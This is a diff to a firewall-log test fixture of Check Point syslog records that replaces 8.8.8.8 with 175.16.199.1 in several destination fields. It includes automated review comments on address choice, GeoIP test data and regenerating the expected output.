 <134>1 2020-03-29T22:53:51Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e8126ff,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60640"; service:"514"; service_id:"syslog"; src:"192.168.1.100"]
 <134>1 2020-03-29T22:54:00Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812708,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"83.98.201.134"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"53028"; service:"123"; service_id:"ntp-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T22:54:00Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812708,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"49503"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T22:54:00Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812708,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"49503"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T22:54:02Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e81270a,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.255"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"138"; service:"138"; service_id:"nbdatagram"; src:"192.168.1.117"]
-<134>1 2020-03-29T22:54:10Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812712,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585522450"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"40729"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T22:54:10Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812712,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585522450"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"40729"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T22:54:10Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e812712,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"38518"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T22:54:10Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e812712,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"56585"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T22:54:10Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e812712,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"104.99.234.45"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"53730"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10744"; xlatesrc:"0.0.0.0"]
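Review bot: The replacement address `175.16.199.1` written into the two `dst:` fields of this hunk is not an RFC 5737 documentation address (192.0.2.0/24, 198.51.100.0/24, 203.0.113.0/24), so the fixture still names a publicly routed host rather than a reserved one. If the address was chosen deliberately because it resolves in the GeoIP test database used by the pipeline tests, that intent is not visible here and a one-line note in the PR description or a sibling README would stop a later cleanup from "fixing" it back to a TEST-NET range. Presumably the generated expected-output file for this sample log has to be regenerated in the same change, since every `destination.ip`/geo field derived from these records will differ; that file is not in this hunk, so please confirm it is part of the commit. Only the `dst:` value changes in both records; the other surrounding real-looking addresses in the context lines (`83.98.201.134`, `104.99.234.45`, `192.124.249.41`) are left as they were, which is consistent with the narrow scope of the substitution but worth stating if the goal was to scrub public addresses from the fixture.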
@@ -6730,9 +6730,9 @@ <134>1 2020-03-29T23:11:53Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e812b39,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60640"; service:"514"; service_id:"syslog"; src:"192.168.1.100"] <134>1 2020-03-29T23:11:55Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e812b3b,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"52322"; service:"443"; service_id:"https"; src:"192.168.1.117"] <134>1 2020-03-29T23:11:55Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e812b3b,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"52323"; service:"443"; service_id:"https"; src:"192.168.1.117"] -<134>1 2020-03-29T23:12:34Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812b62,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"55037"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T23:12:34Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812b62,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"55037"; service:"53"; service_id:"domain-udp"; 
src:"192.168.2.2"] <134>1 2020-03-29T23:12:35Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e812b63,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43103"; service:"514"; service_id:"syslog"; src:"192.168.1.100"] -<134>1 2020-03-29T23:12:44Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812b6c,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585523564"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"35918"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T23:12:44Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812b6c,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585523564"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"35918"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T23:12:44Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e812b6c,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"63204"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"] <134>1 2020-03-29T23:12:44Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e812b6c,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"55586"; service:"53"; service_id:"domain-udp"; 
src:"192.168.1.100"] <134>1 2020-03-29T23:12:44Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e812b6c,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"104.99.234.45"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"54204"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10785"; xlatesrc:"0.0.0.0"] 
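Review bot: The two changed lines in this hunk swap `dst:"8.8.8.8"` for `dst:"175.16.199.1"` but leave other real, routable destinations in the same fixture untouched — the final context line still carries `dst:"104.99.234.45"` — so if the intent is to scrub live addresses from the test data, the scrub is incomplete. `175.16.199.1` is itself allocated, routable space rather than an RFC 5737 documentation address (`192.0.2.0/24`, `198.51.100.0/24`, `203.0.113.0/24`); if it was chosen because the GeoIP test database used by the module's golden tests has an entry for that prefix, that rationale should be stated in the commit message so a later cleanup does not revert it to a documentation range and silently break the geo-enrichment expectations. Presumably the matching expected-output JSON for this log must be regenerated with the same address; that file is not in this chunk, so I cannot confirm it was updated.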
@@ -6904,34 +6904,34 @@ <134>1 2020-03-29T23:17:01Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e812c6d,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43103"; service:"514"; service_id:"syslog"; src:"192.168.1.100"] <134>1 2020-03-29T23:17:09Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e812c75,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"52351"; service:"443"; service_id:"https"; src:"192.168.1.117"] <134>1 2020-03-29T23:17:09Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e812c75,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"52352"; service:"443"; service_id:"https"; src:"192.168.1.117"] -<134>1 2020-03-29T23:17:13Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812c79,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"40357"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T23:17:13Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812c79,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585523833"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60023"; service:"53"; 
service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T23:17:13Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812c79,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"40357"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T23:17:13Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812c79,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585523833"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60023"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T23:17:14Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e812c7a,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & 
